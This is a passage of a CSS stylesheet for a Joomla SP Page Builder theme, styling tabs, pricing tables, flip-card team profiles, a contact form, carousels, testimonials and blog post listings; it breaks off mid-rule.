.flex-icons .flex-icon-wrap a span i {
  vertical-align: middle;
  margin-top: -2px;
  text-align: center;
}
.flex-icons .flex-icon-wrap a span i.fa {
  margin-top: 0;
}
.flex-icons .flex-icon-wrap a span i.fas {
  margin-top: 0;
}
.flex-icons .flex-icon-wrap a:hover {
  opacity: 0.85;
}
.flex-icons .flex-icon-wrap:last-child {
  margin-right: 0;
}
.flex-icons.zoom .flex-icon-wrap:hover,
.flex-icons.zoom .flex-icon-wrap:active {
  -webkit-transform: scale(1.1);
  -moz-transform: scale(1.1);
  -ms-transform: scale(1.1);
  -o-transform: scale(1.1);
  transform: scale(1.1);
}
.mod-sppagebuilder .sppb-nav-tabs >li {
  display: table-cell !important;
}
.sppb-nav-tabs {
  border-bottom: 0;
}
.sppb-nav-tabs >li {
  float: none;
  display: table-cell;
  width: 1%;
  text-align: center;
}
.sppb-nav-tabs >li >a {
  font-size: inherit;
  font-weight: normal;
  background: #F7F7F7;
  border: 0;
  border: 1px solid #eee;
  border-bottom: 1px solid #ddd;
  border-radius: 4px 4px 0 0;
  margin: 0;
}
.sppb-nav-tabs >li.active >a {
  background: transparent;
  border-bottom: 1px solid #fff;
  border-left: 1px solid #ddd;
  border-right: 1px solid #ddd;
  border-top-width: 1px;
}
.sppb-nav-tabs >li.active >a:hover,
.sppb-nav-tabs >li.active >a:focus {
  background: transparent;
  border-bottom: 1px solid #fff;
  border-left: 1px solid #ddd;
  border-right: 1px solid #ddd;
  border-top-width: 1px;
}
.sppb-nav-tabs .pe {
  font-size: 120%;
  vertical-align: middle;
  line-height: 1;
  margin-top: -3px;
  margin-right: 5px;
}
.sppb-nav-tabs .pe.bold {
  font-weight: 600;
}
.sppb-nav-modern >li >a,
.sppb-nav-lines >li >a {
  padding-left: 25px;
  padding-right: 25px;
}
.flex .sppb-tab .sppb-nav-tabs >li {
  box-shadow: inset 0 -1px 0px #ddd;
}
.flex .sppb-tab .sppb-nav-tabs >li >a {
  background: #F7F7F7;
  border: 0;
  border: 1px solid #eee;
  border-bottom: 1px solid #ddd;
  margin: 0 2px;
}
.flex .sppb-tab .sppb-nav-tabs >li.active >a {
  background: transparent;
  border-bottom: 1px solid #fff;
  border-right: 1px solid #ddd;
  border-left: 1px solid #ddd;
  border-top-width: 2px;
}
.flex .sppb-tab .sppb-nav-tabs >li.active >a:hover,
.flex .sppb-tab .sppb-nav-tabs >li.active >a:focus {
  background: transparent;
  border-bottom: 1px solid #fff;
  border-right: 1px solid #ddd;
  border-top-width: 2px;
}
.flex .sppb-tab .sppb-tab-content {
  padding: 5% 3%;
}
.sppb-tab .sppb-tab-content {
  padding: 2%;
  text-align: left;
}
.sppb-tab .sppb-nav-tabs-content {
  border: none;
  padding: 5% 3%;
}
.sppb-tab .sppb-tab-subtitle {
  display: none;
  clear: both;
  font-size: 90%;
  padding: 7px 0 0;
}
.sppb-tab li.active .sppb-tab-subtitle {
  display: block;
}
.sppb-nav-pills >li {
  float: none;
  display: table-cell;
  width: 1%;
  text-align: center;
}
.sppb-nav-pills >li >a {
  margin: 0 1%;
  -webkit-transition: 300ms;
  -moz-transition: 300ms;
  -o-transition: 300ms;
  transition: 300ms;
  font-size: inherit;
  font-weight: normal;
}
.sppb-nav-pills >li >a .pe {
  font-size: 120%;
  vertical-align: middle;
  line-height: 1;
  margin-top: -3px;
  margin-right: 5px;
}
.sppb-nav-pills >li >a .pe.bold {
  font-weight: 600;
}
.sppb-nav-pills >li.active >a {
  box-shadow: none;
}
.sppb-nav-pills >li.active >a:focus {
  background: transparent;
}
.sppb-nav-pills + .sppb-tab-content {
  padding: 2% 1%;
}
.sppb-addon-tab.icons .sppb-tab .sppb-nav-pills {
  margin: 0 auto;
  text-align: center;
  -webkit-transition: 300ms;
  -moz-transition: 300ms;
  -o-transition: 300ms;
  transition: 300ms;
}
.sppb-addon-tab.icons .sppb-tab .sppb-nav-pills >li {
  display: inline-table;
}
.sppb-addon-tab.icons .sppb-tab .sppb-nav-pills >li >a {
  text-align: center;
  margin: 0;
  box-shadow: none;
  -webkit-transition: 300ms;
  -moz-transition: 300ms;
  -o-transition: 300ms;
  transition: 300ms;
}
.sppb-addon-tab.icons .sppb-tab .sppb-nav-pills >li >a:hover,
.sppb-addon-tab.icons .sppb-tab .sppb-nav-pills >li >a:focus {
  box-shadow: none;
  background: none;
}
.sppb-addon-tab.icons .sppb-tab .sppb-nav-pills >li >a i {
  text-align: center;
  font-size: 200%;
  line-height: 1;
  -webkit-transition: 300ms;
  -moz-transition: 300ms;
  -o-transition: 300ms;
  transition: 300ms;
}
.sppb-addon-tab.icons .sppb-tab .sppb-nav-pills >li >a i.pe {
  font-size: 300%;
}
.sppb-addon-tab.icons .sppb-tab .sppb-nav-pills >li.active >a {
  box-shadow: none;
}
.sppb-addon-tab.icons .sppb-tab .sppb-nav-pills >li.active >a:focus {
  background: transparent;
}
.sppb-addon-tab.icons .sppb-tab-content {
  padding: 1%;
}
.sppb-nav-tabs >li >a i,
.sppb-nav-pills >li >a i {
  margin-right: 3px;
}
.sppb-tab .sppb-nav.adaptive >li {
  display: inline-block;
  width: auto;
}
.sppb-tab .sppb-nav.adaptive.sppb-nav-pills >li a {
  width: 100%;
}
.sppb-custom-tab .sppb-tab-custom-content {
  padding-top: 0;
  margin-top: 0;
}
.sppb-pricing-box {
  border: 0;
  padding: 0;
}
.sppb-pricing-box.sppb-pricing-featured .sppb-pricing-header {
  color: #fff;
}
.sppb-pricing-box .sppb-pricing-header {
  padding: 25px 20px 20px;
  background: rgba(0,0,0,0.05);
}
.sppb-pricing-box .sppb-pricing-header >.sppb-pricing-title {
  margin: 0;
  padding: 0;
  font-size: 125%;
  line-height: 1.1;
  font-weight: 300;
}
.sppb-pricing-box .sppb-pricing-header .sppb-pricing-price {
  margin: 0;
  padding: 0;
  font-size: 430%;
  line-height: 1.3;
}
.sppb-pricing-box .sppb-pricing-header .sppb-pricing-price .sppb-pricing-currency {
  font-size: 55%;
  line-height: 2.4;
  vertical-align: top;
  text-align: center;
  padding: 0 5px;
}
.sppb-pricing-box .sppb-pricing-header .sppb-pricing-price .sppb-pricing-duration {
  font-size: 40%;
  line-height: 1.7;
  vertical-align: bottom;
  text-align: center;
}
.sppb-pricing-box .sppb-pricing-features {
  padding: 0;
}
.sppb-pricing-box .sppb-pricing-features >ul {
  list-style: none;
  padding: 0;
  margin: 0;
}
.sppb-pricing-box .sppb-pricing-features >ul >li {
  display: block;
  padding: 12px 20px;
}
.sppb-pricing-box .sppb-pricing-features >ul >li:nth-child(odd) {
  border-top: 1px solid rgba(0,0,0,0.1);
  border-bottom: 1px solid rgba(0,0,0,0.1);
}
.sppb-pricing-box .sppb-pricing-footer {
  background: rgba(0,0,0,0.05);
  border-top: 1px solid rgba(0,0,0,0.1);
  padding: 20px;
}
.sppb-pricing-box .sppb-pricing-footer >a.sppb-btn {
  margin: 0 auto;
}
.sppb-pricing-box .sppb-pricing-footer >a.sppb-btn >i {
  margin-right: 5px;
}
.sppb-pricing-box .sppb-pricing-footer >a.sppb-btn >i.pe {
  font-size: 120%;
  vertical-align: middle;
  margin: -3px 5px 0 0;
  line-height: 1.4;
}
.transparent .sppb-pricing-box {
  border: 0;
  box-shadow: none;
}
.transparent .sppb-pricing-box .sppb-pricing-header {
  background: transparent;
}
.transparent .sppb-pricing-box.sppb-pricing-featured .sppb-pricing-header {
  background-color: transparent;
}
.transparent .sppb-pricing-box .sppb-pricing-features {
  padding: 10px 0;
}
.transparent .sppb-pricing-box .sppb-pricing-features >ul >li {
  border: 0;
  padding: 10px 20px;
}
.transparent .sppb-pricing-box .sppb-pricing-footer {
  background: transparent;
  border: 0;
}
.flex .sppb-pricing-box {
  border: 0;
  padding: 0;
}
.flex .sppb-pricing-box .sppb-pricing-header {
  padding: 25px 20px 20px;
  background: transparent;
}
.flex .sppb-pricing-box .sppb-pricing-features {
  padding: 20px 0;
}
.flex .sppb-pricing-box .sppb-pricing-features >ul {
  list-style: none;
  padding: 0;
  margin: 0;
}
.flex .sppb-pricing-box .sppb-pricing-features >ul >li {
  display: block;
  padding: 8px 0;
}
.flex .sppb-pricing-box .sppb-pricing-features >ul >li:nth-child(odd) {
  background: rgba(0,0,0,0.03);
}
.flex .sppb-pricing-box .sppb-pricing-footer {
  padding: 20px;
}
.flex .sppb-pricing-box .sppb-pricing-footer >a.sppb-btn.sppb-btn-block {
  font-size: 120%;
  border: 1px solid rgba(0,0,0,0.15);
  border-radius: 0;
  margin: -1px 0 0;
  line-height: 2.5;
}
.flex .sppb-pricing-box.sppb-pricing-featured {
  background: transparent;
}
.flex .sppb-pricing-box.sppb-pricing-featured .sppb-pricing-header {
  padding: 25px 20px;
  color: #fff;
}
.sppb-addon-text-block .sppb-addon-title {
  line-height: 1.3;
}
.sppb-addon-person .sppb-addon-content > div {
  margin-top: 15px;
}
.sppb-addon-person .sppb-addon-content > div:first-child {
  margin-top: 0;
}
.sppb-addon-person .sppb-person-information > span {
  display: block;
}
.sppb-addon-person .sppb-person-information > span.sppb-person-name {
  font-size: 17px;
  line-height: 1.5;
  font-weight: bold;
}
.sppb-addon-person .sppb-person-information > span.sppb-person-designation {
  font-size: 13px;
  color: #888;
}
.sppb-addon-person .sppb-person-social {
  list-style: none;
  display: block;
  padding: 0;
  margin: 0 -8px;
}
.sppb-addon-person .sppb-person-social > li {
  display: inline-block;
  margin: 0 8px;
}
.sppb-addon-person .sppb-person-social > li > a {
  display: block;
  font-size: 16px;
  line-height: 16px;
  color: #999;
}
.sppb-addon-person .sppb-person-social > li > a:hover {
  color: #666;
}
.flex.flip-container {
  -webkit-perspective: 680;
  -moz-perspective: 680;
  perspective: 680;
  -ms-perspective: 680;
  -o-perspective: 680;
}
.flex.flip-container .flipper {
  position: relative;
  display: block;
  -webkit-transform-style: preserve-3d;
  -moz-transform-style: preserve-3d;
  -ms-transform-style: preserve-3d;
  -o-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.flex.flip-container .flipper .front,
.flex.flip-container .flipper .back {
  -webkit-backface-visibility: hidden;
  -moz-backface-visibility: hidden;
  -ms-backface-visibility: hidden;
  -o-backface-visibility: hidden;
  backface-visibility: hidden;
  -webkit-transition: 1s;
  -o-transition: 1s;
  transition: 1s;
  -webkit-transform-style: preserve-3d;
  -moz-transform-style: preserve-3d;
  -ms-transform-style: preserve-3d;
  -o-transform-style: preserve-3d;
  transform-style: preserve-3d;
  padding: 0 0 12px;
}
.flex.flip-container .flipper .front {
  z-index: 2;
  -webkit-transform: rotateY(0deg);
  -moz-transform: rotateY(0deg);
  -ms-transform: rotateY(0deg);
  -o-transform: rotateY(0deg);
  transform: rotateY(0deg);
  position: relative;
}
.flex.flip-container .flipper .front .sppb-person-information {
  padding: 0 15px;
}
.flex.flip-container .flipper .back {
  z-index: 1;
  -webkit-transform: rotateY(-180deg);
  -moz-transform: rotateY(-180deg);
  -ms-transform: rotateY(-180deg);
  -o-transform: rotateY(-180deg);
  transform: rotateY(-180deg);
  position: absolute;
  top: 0;
  height: 100%;
  width: 100%;
  left: 0;
}
.flex.flip-container .flipper .back .sppb-person-block {
  background: #888;
  display: inline-block;
  width: 100%;
  margin: 0;
  padding: 0;
}
.flex.flip-container .flipper .back .sppb-person-block >.thumb {
  float: left;
  width: 40%;
}
.flex.flip-container .flipper .back .sppb-person-block >.thumb >img {
  width: 100%;
  height: auto;
  margin: 0 15px 0 0;
}
.flex.flip-container .flipper .back .sppb-person-block .sppb-person-information {
  padding: 15px 5px 0 12px;
  width: 60%;
  display: block;
  float: left;
  text-align: left;
  font-size: 90%;
}
.flex.flip-container .flipper .back .sppb-person-block .sppb-person-information .sppb-person-name {
  margin: 0 0 10px 0;
  color: #fff;
}
.flex.flip-container .flipper .back .sppb-person-block .sppb-person-information .sppb-person-designation {
  line-height: 1.4;
  color: #ddd;
}
.flex.flip-container .flipper .back .sppb-person-block .sppb-person-information.flip {
  padding: 15px 15px 0;
  width: 100%;
}
.flex.flip-container .flipper .back .sppb-person-block .sppb-person-information.flip .sppb-person-name {
  color: #595959;
}
.flex.flip-container .flipper .back .sppb-person-block .sppb-person-information.flip .sppb-person-designation {
  color: #404040;
}
.flex.flip-container .flipper .back .sppb-person-block.flip {
  background: transparent;
}
.flex.flip-container .flipper .back .sppb-person-introtext {
  display: block;
  clear: both;
  text-align: left;
  padding: 0 15px;
  line-height: 1.5;
  font-size: 90%;
}
.flex.flip-container .flipper .back .sppb-person-social-icons {
  position: absolute;
  width: 100%;
  bottom: 2.5%;
}
.flex.flip-container .flipper .back.flip {
  background: transparent;
}
.flex.flip-container:hover .flipper .front {
  -webkit-transform: rotateY(180deg);
  -moz-transform: rotateY(180deg);
  -ms-transform: rotateY(180deg);
  -o-transform: rotateY(180deg);
  transform: rotateY(180deg);
}
.flex.flip-container:hover .flipper .back {
  -webkit-transform: rotateY(0deg);
  -moz-transform: rotateY(0deg);
  -ms-transform: rotateY(0deg);
  -o-transform: rotateY(0deg);
  transform: rotateY(0deg);
}
.sppb-progress {
  padding: 0;
  margin: 0;
}
.flex-text-wrapper {
  margin: 15px 0 3px;
}
.flex-text-wrapper .flex-text {
  margin: 20px 0 0;
  display: table-cell;
  width: 1%;
}
.flex-text-wrapper .flex-progress-text {
  margin: 20px 0 0;
  width: 1%;
  display: table-cell;
  text-align: right;
}
.centered {
  text-align: center;
}
.centered >div,
.centered >a {
  text-align: center;
}
.sppb-media.default >a >img,
.sppb-media.default >a >i {
  -webkit-transition: border-color 300ms;
  -moz-transition: border-color 300ms;
  -o-transition: border-color 300ms;
  transition: border-color 300ms;
  margin-top: 2px;
}
.sppb-media.default i {
  border: 1px solid #ccc;
  border-radius: 4px;
  font-size: 220%;
  color: #ccc;
  background: #f1f1f1;
  box-shadow: inset 0 0 0 4px #fff;
  line-height: 1;
  text-align: center;
}
.sppb-media.default i.pe-7s-link {
  font-size: 140%;
  color: #aaa;
  padding: 3px 5px;
  background: transparent;
  border: none;
}
.sppb-media.default footer {
  margin: 10px auto;
}
.sppb-media.flex >a >img,
.sppb-media.flex >a >i {
  -webkit-transition: border-color 300ms;
  -moz-transition: border-color 300ms;
  -o-transition: border-color 300ms;
  transition: border-color 300ms;
}
.sppb-media.flex >a >img.sppb-media-object {
  margin: 3px auto 0;
  border-radius: 4px;
  border: 1px solid #ddd;
  padding: 4px;
}
.sppb-media.flex .div-pull-center {
  margin: 0 auto 12px;
  clear: both;
}
.sppb-media.flex img.sppb-media-object {
  margin-top: 6px;
  border-radius: 3px;
}
.sppb-media.flex i.fa-user,
.sppb-media.flex i.fa-user-plus {
  margin-top: 4px;
  border: 1px solid #ddd;
  border-radius: 4px;
  font-size: 220%;
  color: #ccc;
  background: #f1f1f1;
  box-shadow: inset 0 0 0 4px #fff;
  text-align: center;
}
.sppb-media.flex >.sppb-media-body {
  line-height: 1.6;
}
.sppb-media.flex >.sppb-media-body >i.fa,
.sppb-media.flex >.sppb-media-body >i.fas {
  font-size: 22px;
  width: 20px;
  line-height: 1;
  vertical-align: middle;
}
.sppb-media.flex >.sppb-media-body >i.fa.fa-quote-left,
.sppb-media.flex >.sppb-media-body >i.fas.fa-quote-left {
  margin: -2px 10px 2px 0;
  display: inline-block;
}
.sppb-media.flex >.sppb-media-body >i.fa.fa-quote-right,
.sppb-media.flex >.sppb-media-body >i.fas.fa-quote-right {
  margin: 1px 0 0 10px;
  display: inline-block;
}
.sppb-media.flex >.sppb-media-body footer {
  margin: 10px auto 0;
  width: 100%;
  clear: both;
}
.sppb-addon-ajax-contact .sppb-ajaxt-contact-form .gutter {
  padding: 0 10px;
}
.sppb-addon-ajax-contact .sppb-ajaxt-contact-form .sppb-form-group {
  margin: 0 auto 10px;
  padding: 0 5px;
}
.sppb-addon-ajax-contact .sppb-ajaxt-contact-form .sppb-form-group label {
  padding: 0 3px;
}
.sppb-addon-ajax-contact .sppb-ajaxt-contact-form .sppb-form-group input {
  height: 38px;
}
.sppb-addon-ajax-contact .sppb-ajaxt-contact-form .sppb-form-group .sppb-form-control[placeholder] {
  line-height: 1.9;
  border: 1px solid #c9c9c9;
  box-shadow: none;
  background: transparent;
  -webkit-transition: all .3s ease-in-out .2s;
  -moz-transition: all .3s ease-in-out .2s;
  -o-transition: all .3s ease-in-out .2s;
  transition: all .3s ease-in-out .2s;
}
.sppb-addon-ajax-contact .sppb-ajaxt-contact-form .sppb-form-group .sppb-form-control[placeholder]::-moz-placeholder {
  -webkit-transition: all .4s ease-out;
  -moz-transition: all .4s ease-out;
  -o-transition: all .4s ease-out;
  transition: all .4s ease-out;
  opacity: 1;
}
.sppb-addon-ajax-contact .sppb-ajaxt-contact-form .sppb-form-group .sppb-form-control[placeholder]::-webkit-input-placeholder {
  -webkit-transition: all .3s ease-in-out .15s;
  -moz-transition: all .3s ease-in-out .15s;
  -o-transition: all .3s ease-in-out .15s;
  transition: all .3s ease-in-out .15s;
  opacity: 1;
  text-indent: -1px;
}
.sppb-addon-ajax-contact .sppb-ajaxt-contact-form .sppb-form-group .sppb-form-control[placeholder]::-webkit-input-placeholder:before {
  font-family: 'peIcon7';
  opacity: .8;
  text-align: center;
  width: 44px;
  margin-right: 7px;
  font-size: 125%;
  line-height: 1.33;
  vertical-align: top;
}
.sppb-addon-ajax-contact .sppb-ajaxt-contact-form .sppb-form-group .sppb-form-control[placeholder]:focus::-moz-placeholder {
  opacity: 0.2;
}
.sppb-addon-ajax-contact .sppb-ajaxt-contact-form .sppb-form-group .sppb-form-control[placeholder]:focus::-webkit-input-placeholder {
  opacity: 0;
  text-indent: -25px;
}
.sppb-addon-ajax-contact .sppb-ajaxt-contact-form .sppb-form-group .sppb-form-control[placeholder].input-name[placeholder]::-webkit-input-placeholder:before {
  content: "\e605";
}
.sppb-addon-ajax-contact .sppb-ajaxt-contact-form .sppb-form-group .sppb-form-control[placeholder].input-email[placeholder]::-webkit-input-placeholder:before {
  content: "\e639";
}
.sppb-addon-ajax-contact .sppb-ajaxt-contact-form .sppb-form-group .sppb-form-control[placeholder].input-subject[placeholder]::-webkit-input-placeholder:before {
  content: "\e62c";
}
.sppb-addon-ajax-contact .sppb-ajaxt-contact-form .sppb-form-group .sppb-form-control[placeholder].input-message[placeholder]::-webkit-input-placeholder:before {
  content: "\e66d";
}
.sppb-addon-ajax-contact .sppb-ajaxt-contact-form .sppb-form-group .sppb-form-control[placeholder].input-captcha[placeholder]::-webkit-input-placeholder {
  text-indent: 2px;
}
.sppb-addon-ajax-contact .sppb-ajaxt-contact-form .tos label {
  padding: 5px 0;
}
.sppb-addon-ajax-contact .sppb-ajaxt-contact-form .tos label > input {
  margin: 0 5px;
}
.sppb-addon-ajax-contact .sppb-ajaxt-contact-form .sppb-btn {
  margin: 7px 0;
  line-height: 1.9;
}
.sppb-addon-ajax-contact .sppb-ajaxt-contact-form .sppb-btn >i.fa,
.sppb-addon-ajax-contact .sppb-ajaxt-contact-form .sppb-btn >i.fas {
  margin-right: 5px;
  margin-left: -5px;
}
.sppb-addon-ajax-contact .sppb-ajaxt-contact-form .sppb-btn >i.pe {
  margin: -2px 5px 0 -5px;
  padding: 0;
  text-align: center;
  font-size: 120%;
  vertical-align: middle;
  line-height: 1;
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder] {
  line-height: 1.9;
  box-shadow: none;
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]::-webkit-input-placeholder:before {
  opacity: 0.7;
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]:focus {
  box-shadow: none;
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]:focus::-moz-placeholder {
  opacity: 0.2;
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]:focus::-webkit-input-placeholder {
  opacity: 0;
  text-indent: -30px;
}
.sppb-carousel-flex .sppb-carousel-inner >.sppb-item {
  width: 100%;
  height: 100%;
  margin: 0;
  -webkit-transition: .7s cubic-bezier(0.65,0,0.35,1);
  -moz-transition: .7s cubic-bezier(0.65,0,0.35,1);
  -o-transition: .7s cubic-bezier(0.65,0,0.35,1);
  transition: .7s cubic-bezier(0.65,0,0.35,1);
}
.sppb-carousel-flex .sppb-carousel-inner >.sppb-item.sppb-item-has-bg img {
  margin: 0 auto;
  padding: 0;
}
.sppb-carousel-flex .sppb-carousel-inner >.sppb-item .sppb-carousel-item-inner .sppb-carousel-caption {
  margin: 0 auto;
  text-align: center;
}
.sppb-carousel-flex .sppb-carousel-inner >.sppb-item .sppb-carousel-item-inner .sppb-carousel-caption .sppb-carousel-pro-text >h2 {
  margin: 0 auto;
}
.sppb-carousel-flex .sppb-carousel-inner >.sppb-item .sppb-carousel-item-inner .sppb-carousel-caption .sppb-carousel-pro-text >p {
  margin: 25px auto 0;
}
.sppb-carousel-flex .sppb-carousel-arrow {
  top: 50%;
  font-size: 27px;
  width: 32px;
  height: 32px;
  line-height: 29px;
  margin-top: -16px;
  text-align: center;
  background: rgba(0,0,0,0.3);
  border-radius: 4px;
  -webkit-transition: all .2s ease-in-out .1s;
  -moz-transition: all .2s ease-in-out .1s;
  -o-transition: all .2s ease-in-out .1s;
  transition: all .2s ease-in-out .1s;
  opacity: 0;
}
.sppb-carousel-flex .sppb-carousel-arrow i.fa,
.sppb-carousel-flex .sppb-carousel-arrow i.fas {
  text-shadow: none;
  color: #fff;
}
.sppb-carousel-flex .sppb-carousel-arrow i.fa.fa-angle-left,
.sppb-carousel-flex .sppb-carousel-arrow i.fas.fa-angle-left {
  margin: -15px 0 0 -6px;
}
.sppb-carousel-flex .sppb-carousel-arrow i.fa.fa-angle-right,
.sppb-carousel-flex .sppb-carousel-arrow i.fas.fa-angle-right {
  margin: -15px -6px 0 0;
  text-indent: 2px;
  text-align: center;
}
.sppb-carousel-flex .sppb-carousel-arrow.left {
  left: -1px;
}
.sppb-carousel-flex .sppb-carousel-arrow.right {
  right: -1px;
}
.sppb-carousel-flex .sppb-carousel-indicators {
  bottom: -10px;
  opacity: 0;
  -webkit-transition: all .2s ease-in-out .2s;
  -moz-transition: all .2s ease-in-out .2s;
  -o-transition: all .2s ease-in-out .2s;
  transition: all .2s ease-in-out .2s;
}
.sppb-carousel-flex .sppb-carousel-indicators li {
  margin: 0 5px;
  width: 10px;
  height: 10px;
  padding: 0;
  border: none;
  background: rgba(10,10,10,0.12);
}
.sppb-carousel-flex .sppb-carousel-indicators li.active {
  background: rgba(10,10,10,0.4);
}
.sppb-carousel-flex:hover .sppb-carousel-indicators {
  bottom: 10px;
  opacity: 1;
}
.sppb-carousel-flex:hover .sppb-carousel-arrow {
  opacity: 1;
}
.sppb-carousel-flex:hover .sppb-carousel-arrow:hover {
  background: rgba(0,0,0,0.5);
}
.sppb-carousel-flex:hover .sppb-carousel-arrow.left {
  left: 10px;
}
.sppb-carousel-flex:hover .sppb-carousel-arrow.right {
  right: 10px;
}
.sppb-testimonial-flex .sppb-carousel-inner > .sppb-item {
  margin: 0;
  padding: 0;
}
.sppb-testimonial-flex .sppb-img-responsive.sppb-avatar {
  display: inline-block;
}
.sppb-testimonial-flex .sppb-testimonial-message,
.sppb-testimonial-flex .sppb-testimonial-client,
.sppb-testimonial-flex .sppb-img-responsive.sppb-avatar {
  margin-bottom: 10px;
}
.sppb-testimonial-flex .sppb-testimonial-client h4 {
  font-size: 110%;
  font-weight: 700;
}
.sppb-testimonial-flex .sppb-testimonial-message {
  font-size: 100%;
  line-height: 26px;
}
.sppb-testimonial-flex .left >i {
  margin-left: -1px;
}
.sppb-testimonial-flex .right >i {
  margin-right: -3px;
}
.sppb-testimonial-flex .sppb-carousel-control {
  display: inline-block;
  font-size: 20px;
  line-height: 25px;
  width: 28px;
  height: 28px;
  border-radius: 4px;
  text-align: center;
  border: 1px solid #999;
  border: 1px solid rgba(45,45,45,0.15);
  color: #888;
  margin: 8px 3px 0;
  -webkit-transition: 400ms;
  -moz-transition: 400ms;
  -o-transition: 400ms;
  transition: 400ms;
  -webkit-box-sizing: initial;
  -moz-box-sizing: initial;
  box-sizing: initial;
}
.sppb-testimonial-flex .sppb-carousel-control:hover {
  border: 1px solid #f14833;
}
.sppb-carousel-pro .sppb-carousel-inner .sppb-item .sppb-carousel-pro-text {
  text-align: left;
}
.sppb-carousel-pro .sppb-carousel-indicators li {
  margin-right: 5px;
}
.inline-class .sppb-addon-pie-progress {
  display: table-cell;
  width: 1%;
  margin: 0 auto;
}
.sppb-addon-pie-progress .sppb-pie-chart .sppb-chart-icon i.pe {
  vertical-align: middle;
  line-height: 1.4;
}
.sppb-addon.flex .slick-desc span.fa,
.sppb-addon.flex .slick-desc i.fa {
  font-family: inherit;
}
.sppb-addon.flex .slick-desc span.fa::before,
.sppb-addon.flex .slick-desc i.fa::before {
  font-family: 'Font Awesome 5 Free';
  font-weight: 900;
}
.sppb-addon.flex .slick-desc span.fas,
.sppb-addon.flex .slick-desc i.fas {
  font-family: inherit;
}
.sppb-addon.flex .slick-desc span.fas::before,
.sppb-addon.flex .slick-desc i.fas::before {
  font-family: 'Font Awesome 5 Free';
  font-weight: 900;
}
.sppb-addon.flex .slick-desc span.pe,
.sppb-addon.flex .slick-desc i.pe {
  font-family: inherit;
}
.sppb-addon.flex .slick-desc span.pe::before,
.sppb-addon.flex .slick-desc i.pe::before {
  font-family: 'peIcon7';
}
.sppb-addon.flex .slick-prev,
.sppb-addon.flex .slick-next {
  opacity: 0;
  -webkit-transition: all .3s ease-in-out .1s;
  -moz-transition: all .3s ease-in-out .1s;
  -o-transition: all .3s ease-in-out .1s;
  transition: all .3s ease-in-out .1s;
}
.sppb-addon.flex .slick-prev {
  left: -20px;
}
.sppb-addon.flex .slick-next {
  right: -20px;
}
.sppb-addon.flex:hover .slick-prev,
.sppb-addon.flex:hover .slick-next {
  opacity: 1;
}
.sppb-addon.flex:hover .slick-prev {
  left: 0;
}
.sppb-addon.flex:hover .slick-next {
  right: 0;
}
.latest-post {
  margin-bottom: 30px;
}
.latest-post .latest-post-inner {
  padding: 0;
  -webkit-transition: 400ms;
  -moz-transition: 400ms;
  -o-transition: 400ms;
  transition: 400ms;
}
.latest-post .latest-post-inner .entry-meta {
  font-weight: 200;
  font-size: 90%;
  margin-bottom: 20px;
  -webkit-transition: 400ms;
  -moz-transition: 400ms;
  -o-transition: 400ms;
  transition: 400ms;
}
.latest-post .latest-post-inner h2.entry-title {
  font-size: 135%;
  margin-bottom: 20px;
  line-height: 1.35;
  font-weight: 500;
}
.latest-post .latest-post-inner div.img-wrapper {
  position: relative;
  overflow: hidden;
  margin-bottom: 20px;
}
.latest-post .latest-post-inner div.img-wrapper >a >img.post-img {
  -webkit-transform: scale3d(1,1,1);
  transform: scale3d(1,1,1);
  -webkit-transition: all .4s ease-in-out .1s;
  transition: all .4s ease-in-out .1s;
}
.latest-post .latest-post-inner div.img-wrapper:hover >a >img.post-img {
  -webkit-transform: scale3d(1.12,1.12,1);
  transform: scale3d(1.12,1.12,1);
}
.latest-post .latest-post-inner p.intro-text {
  margin-bottom: 20px;
}
.latest-post .latest-post-inner .post-author {
  font-weight: 600;
  font-size: 90%;
}
.latest-post .latest-post-inner .category {
  font-size: 90%;
}
.latest-post .latest-post-inner .category.cat-inline {
  margin: 0 12px;
}
.latest-post .latest-post-inner .category a {
  font-weight: 600;
}
.latest-post .column-1.pull-left,
.latest-post .column-1.pull-right {
  margin: 0;
}
.blog .latest-post {
  margin-bottom: 25px;
}
.blog .latest-post .latest-post-inner,
.blog .latest-post .column-1 {
  background: #fff;
  padding: 20px;
  border: none;
  box-shadow: none;
  -webkit-transition: 400ms;
  -moz-transition: 400ms;
  -o-transition: 400ms;
  transition: 400ms;
}
.blog .latest-post .latest-post-inner h2.entry-title,
.blog .latest-post .column-1 h2.entry-title {
  font-size: 140%;
  font-weight: 500;
  margin-bottom: 20px;
  line-height: 1.3;
}
.blog .latest-post .latest-post-inner h2.entry-title >a,
.blog .latest-post .column-1 h2.entry-title >a {
  display: block;
}
.blog .latest-post .latest-post-inner p.intro-text,
.blog .latest-post .column-1 p.intro-text {
  margin-bottom: 20px;
}
.blog .latest-post .latest-post-inner .post-author,
.blog .latest-post .column-1 .post-author {
  font-weight: 500;
  margin-bottom: 0;
}
.blog .latest-post .latest-post-inner .category,
.blog .latest-post .column-1 .category {
  margin-bottom: 0;
}
.blog .latest-post .latest-post-inner .category a,
.blog .latest-post .column-1 .category a {
  font-weight: 600;
}
.blog .latest-post .latest-post-inner:hover,
.blog .latest-post .column-1:hover {
  background: #f7f7f7;
}
.blog .latest-post .latest-post-inner:hover .entry-meta,
.blog .latest-post .column-1:hover .entry-meta {
  color: #999;
}
.flex .latest-post .latest-post-item {
  background: #fff;
}
.flex .latest-post .latest-post-item div.img-wrapper {
  position: relative;
  overflow: hidden;
  max-width: 100%;
}
.flex .latest-post .latest-post-item div.img-wrapper >a >img.post-img {
  -webkit-transition: 250ms;
  -moz-transition: 250ms;
  -o-transition: 250ms;
  transition: 250ms;
  -webkit-transform: scale3d(1,1,1);
  transform: scale3d(1,1,1);
}
.flex .latest-post .latest-post-item div.img-wrapper >a:after {
  display: block;
  position: absolute;
  content: "";
  bottom: 0;
  box-shadow: 0;
  width: 100%;
  height: 100%;
  text-align: center;
  color: #fff;
  opacity: 0;
  -webkit-transition: 300ms;
  -moz-transition: 300ms;
  -o-transition: 300ms;
  transition: 300ms;
}
.flex .latest-post .latest-post-item div.img-wrapper >a .caption-content {
  position: absolute;
  font-weight: 500;
  font-size: 110%;
  color: #fff;
  padding: 0 10%;
  top: 50%;
  width: 100%;
  text-align: center;
  -webkit-transition: 350ms;
  -moz-transition: 350ms;
  -o-transition: 350ms;
  transition: 350ms;
  transform: translateY(0%);
  text-shadow: 1px 1px 1px rgba(0,0,0,0.2);
  opacity: 0;
